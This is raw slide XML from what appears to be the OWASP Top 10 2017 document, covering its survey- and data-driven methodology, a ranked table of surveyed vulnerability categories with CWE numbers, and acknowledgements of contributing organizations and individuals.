                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{94B94A4E-B1A5-47EC-811D-ED0E559DC71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="7620000"/>
            <a:ext cx="6096000" cy="1371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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TBD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This will be added post-RC2 after further data analysis is completed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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xmlns="" id="{3B246788-8483-43FD-BCB2-20B1833ED144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912147657"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="941499"/>
          <a:ext cx="6858000" cy="820250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5817">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Overview</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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="554360">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At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</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3358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noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Industry Ranked Survey</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3324658">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2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.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Arial" charset="0"/>
                        <a:ea typeface="Arial" charset="0"/>
                        <a:cs typeface="Arial"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Exposure of private information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into the existing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A3:2017-Sensitive Data Exposure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Cryptographic Failures can fit within Sensitive Data Exposure. Insecure deserialization was ranked at number three, so it was added to the Top 10 as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A8:2017-Insecure Deserialization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after risk rating. The fourth ranked User Controlled Key is included in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A5:2017-Broken Access Control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A10:2017-Insufficient Logging and Monitoring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have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response.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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3358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mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Public Data Call</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>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44163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3316032">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Traditionally, the data collected and analyzed was more along the lines of frequency data; how many vulnerabilities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the second was the count of applications that each vulnerability was found in (one or more time). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and analysis work is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available in GitHub</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intend to expand on this with additional structure for 2020 (or earlier).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We received 40+ submissions in the call for data, as many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Veracode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The 23 datasets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3889179698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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sz="3600" dirty="0"/>
              <a:t>+Dat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Methodology and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 15"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4261477424"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495299" y="2920422"/>
          <a:ext cx="5867402" cy="1194378"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>1</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Exposure of Private Information ('Privacy Violation') [CWE-359]</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>748</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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>2</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Cryptographic Failures [CWE-310/311/312/326/327]</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>584</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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>3</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Deserialization of Untrusted Data [CWE-502]</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>514</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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>4</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Traversal) [CWE-639]</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>493</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199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>5</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Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient Logging and Monitoring [CWE-223 / CWE-778]</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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Times New Roman" charset="0"/>
                          <a:cs typeface="Times New Roman" charset="0"/>
                        </a:rPr>
                        <a:t>440</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4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4159351900"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5410200"/>
          <a:ext cx="6858000" cy="3731994"/>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4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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33967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We’d like to thank the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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baseline="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8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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sz="3600" dirty="0"/>
              <a:t>+Ack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>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2386090726"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="4405853"/>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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Data Contributors</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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="40705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We’d like to thank the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many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organizations that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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US"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9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9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For the first time, all the data contributed to a Top 10 release, and the full list of contributors,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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>is publicly available</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a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200"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5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5A19514B-B0EA-4CF0-809D-97D7C4B7BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3427173021"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="119062" y="1676400"/>
          <a:ext cx="6619875" cy="3006090"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="440345039"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="361950">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MicroFocus Fortify​</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Veracode​</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Synopsis​</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Checkmarx​</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ContextIS​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1420739054"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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CDAC​</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Hidden​</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Colegio LaSalle Monteria​</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Linden Lab​</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ITsec Security Services bv​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="2702957963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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EZI​</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Edgescan​</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Purpletalk​</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AsTech Consulting​</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Network Test Labs Inc.​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="2915751994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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Derek Weeks​</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TCS​</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Easybss​</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I4 Consulting​</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ANCAP​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="324951646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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Branding Brand​</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Vantage Point​</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EVRY​</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iBLISS Digital Security​</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Shape Security​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1054797462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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Paladion Networks​</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Secure Network​</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Web​</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Contrast Security​</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Hamed​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1274230784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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Khallaagh​</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DDoS.com​</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Minded Security​</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BUGemot​</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Softtek​</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1928526564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">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M. Limacher IT</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:b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Dienstleistungen​</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Osampa​</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Atos​</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National Center for Cyber Security Technology​</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a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SHCP​</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="942100138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5A19514B-B0EA-4CF0-809D-97D7C4B7BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675614421"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228599" y="6096000"/>
          <a:ext cx="6400800" cy="2499360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike"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ak47gen</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Davewichers</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jeremylong</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pontocom</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marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="b" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRP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tsohlacol</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420739054"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">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Alonergan</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Drwetter</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jmanico</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psiinon</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vdbaan</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702957963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
